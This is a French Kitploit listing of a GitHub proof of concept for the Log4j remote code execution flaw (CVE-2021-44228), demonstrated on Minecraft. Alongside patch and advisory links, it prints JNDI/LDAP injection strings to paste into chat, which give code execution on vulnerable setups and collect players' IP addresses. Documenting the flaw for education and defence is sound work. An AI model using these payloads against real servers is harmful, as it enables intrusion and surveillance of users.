Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4J-RCE-Proof-Of-Concept — Log4j-RCE (CVE-2021-44228) Preuve de concept avec des informations supplémentaires | Kitploit
Outils/GitHubGitHub/hycrafthd/log4j-rce-proof-of-concept
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhycrafthd/log4j-rce-proof-of-concept

Log4J-RCE-Proof-Of-Concept

Log4j-RCE (CVE-2021-44228) Preuve de concept avec des informations supplémentaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôtSite web
18231il y a 4 ansVérifié par Kitploit

Preuve de concept de RCE Log4J (CVE-2021-44228)

Ceci est une preuve de concept de la RCE Log4j.

Voici quelques liens pour la CVE-2021-44228 :

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Ce bogue affecte presque toutes les versions de log4j2 et peut-être de log4j1. La version recommandée est 2.15.0 qui corrige l'exploit.

Démonstration avec Minecraft (qui utilise log4j2)

  • Les détails concernant l'impact sur Minecraft sont listés ici : https://twitter.com/slicedlime/status/1469150993527017483
  • Article de Minecraft ici : https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Versions corrigées de Minecraft Forge : https://twitter.com/gigaherz/status/1469331288368861195
  • Article détaillé de Minecraft Forge : https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Versions corrigées de Minecraft Fabric : https://twitter.com/slicedlime/status/1469192689904193537
  • Versions corrigées de Minecraft Paper : https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Versions corrigées de Minecraft Spigot : https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Versions corrigées de Minecraft Sponge : https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag ou envoi de données sérialisées

  • Collez ${jndi:ldap://127.0.0.1/e} dans le chat. Si un socket est ouvert sur le port 389, logj4 essaie de se connecter et bloque toute communication ultérieure jusqu'à l'expiration du délai.
  • Lorsque vous utilisez cette preuve de concept d'exploit, le journal dans la console enregistrera THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! qui est un objet chaîne sérialisé provenant du serveur LDAP.

image

  • De plus, le serveur LDAP malveillant reçoit chaque adresse IP où le message est enregistré. Cela signifie que les adresses IP des joueurs sur un serveur peuvent être collectées via cet exploit.

RCE

  • Collez ${jndi:ldap://127.0.0.1/exe} dans le chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true est défini sur true, l'exécution de code à distance aura lieu.

image

  • Heureusement, les JDK modernes désactivent le chargement de classes à distance par défaut. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Les anciennes versions peuvent encore permettre cela !!

Avertissement

Ce projet est uniquement à des fins éducatives.

Télécharger l’outil